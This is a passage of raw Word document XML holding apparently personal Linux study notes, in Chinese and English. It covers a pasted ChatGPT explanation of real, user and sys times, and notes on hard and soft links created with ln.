      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>有什么区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D994D05" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B6F75DC" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:r w:rsidRPr="00CE509C">
        <w:t>what is the difference among real user sys?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E092607" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE509C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ChatGPT said:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5004C1B8" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:r w:rsidRPr="00CE509C">
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61888E40" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:r w:rsidRPr="00CE509C">
        <w:t>The terms "real," "user," and "sys" refer to different types of time measurements used in Unix-like operating systems (like Linux) when a command is executed. Here's what each of these terms means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC6285B" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE509C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real Time (real)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE509C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2307159C" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE509C">
        <w:t>This is the total elapsed time from start to finish of the command, also known as "wall-clock time." It includes all time spent running the command, including time spent waiting for system resources (e.g., I/O operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D4C063" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE509C">
        <w:t>Example: If you start a command and it takes 10 seconds to complete, regardless of what the CPU was doing during that time, the real time will be 10 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E57114" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE509C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Time (user)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE509C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322FE14F" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE509C">
        <w:t>This is the amount of time the CPU spent in user mode executing the command's code (i.e., time spent running the user-level code). It does not include time spent on system calls or I/O operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E373C1" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE509C">
        <w:t>Example: If the command requires intensive calculations, the user time will reflect the time the CPU was busy performing these calculations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDCAE12" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE509C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System Time (sys)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE509C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560EC539" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE509C">
        <w:t>This represents the amount of time the CPU spent in kernel mode (system mode) performing tasks on behalf of the process, such as executing system calls (e.g., file operations, memory management).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB11000" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE509C">
        <w:t>Example: If the command involves a lot of file I/O, the sys time will be higher because the CPU spends time managing these operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BF7FE2" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE509C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary of Your Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B99B733" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE509C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>real 0m0.136s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE509C">
        <w:t>: The command took 0.136 seconds of wall-clock time to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6315FEE9" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE509C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user 0m0.010s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE509C">
        <w:t>: The CPU spent 0.010 seconds executing the user-level code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE11340" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE509C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sys 0m0.070s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE509C">
        <w:t>: The CPU spent 0.070 seconds performing system-level tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5A1E5F" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRPr="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F8CAEE5" w14:textId="77777777" w:rsidR="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="106C8894" w14:textId="5E512F37" w:rsidR="00D04762" w:rsidRDefault="00D04762" w:rsidP="00D04762">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ln</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>创建硬链接和软链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC23067" w14:textId="77777777" w:rsidR="00D04762" w:rsidRDefault="00D04762" w:rsidP="00D04762">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40ED01D9" w14:textId="77777777" w:rsidR="00E80B40" w:rsidRDefault="00915490" w:rsidP="00D04762">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352BB6BD" w14:textId="0A633D9E" w:rsidR="00915490" w:rsidRDefault="007B073A" w:rsidP="00D04762">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId69" w:history="1">
        <w:r w:rsidRPr="0065580F">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://developer.aliyun.com/article/1504060?spm=5176.26934562.main.1.6a7535dfsJpXKW</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="70FB8224" w14:textId="3EE63C5A" w:rsidR="007B073A" w:rsidRDefault="007B073A" w:rsidP="00D04762">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId70" w:history="1">
        <w:r w:rsidRPr="0065580F">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://xzchsia.github.io/2020/03/05/linux-hard-soft-link/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="429C6A95" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="00D04762">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659D330A" w14:textId="27E018BB" w:rsidR="00915490" w:rsidRDefault="007B073A" w:rsidP="00D04762">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="575C09A2" wp14:editId="1A95D3FE">
            <wp:extent cx="5274310" cy="4218305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1648727144" name="图片 1" descr="Linux硬链接和软连接的区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ux硬链接和软连接的区别"/>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4218305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E44822" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>硬链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AFEDFC" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>具有相同</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>inode</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>节点号的多个文件互为硬链接文件；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C49A7C7" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>删除硬链接文件或者删除源文件任意之一，文件实体并未被删除；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B63EDA" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>只有删除了源文件和所有对应的硬链接文件，文件实体才会被删除；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A962EED" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>硬链接文件是文件的另一个入口；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E930C26" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>可以通过给文件设置硬链接文件来防止重要文件被误删；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A45BD4F" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>创建硬链接命令</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> ln </w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>源文件</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>硬链接文件；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207C5FAF" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>硬链接文件是普通文件，可以用</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>rm</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>删除；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6F8A33" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>对于静态文件（没有进程正在调用），当硬链接数为</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>时文件就被删除。注意：如果有进程正在调用，则无法删除或者即使文件名被删除但空间不会释放。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7815A742" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>软链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BE7BEB" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>软链接类似</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>系统的快捷方式；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A4EAC5" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>软链接里面存放的是源文件的路径，指向源文件；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CF5FE8" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>删除源文件，软链接依然存在，但无法访问源文件内容；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269F270B" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>软链接失效时一般是白字红底闪烁；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A989B8" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>创建软链接命令</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> ln -s </w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>源文件</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>软链接文件；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D151E93" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>软链接和源文件是不同的文件，文件类型也不同，</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>inode</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>号也不同；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E42D93A" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>软链接的文件类型是“</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>”，可以用</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>rm</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>删除。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5594483B" w14:textId="77777777" w:rsidR="007B073A" w:rsidRPr="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>硬链接和软链接的区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311A6B42" w14:textId="34A3E82F" w:rsidR="007B073A" w:rsidRDefault="007B073A" w:rsidP="007B073A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>原理上，硬链接和源文件的</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>inode</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>节点号相同，两者互为硬链接。软连接和源文件的</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>inode</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>节点号不同，进而指向的</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>block</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>也不同，软连接</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>block</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>中存放了源文件的路径名。</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
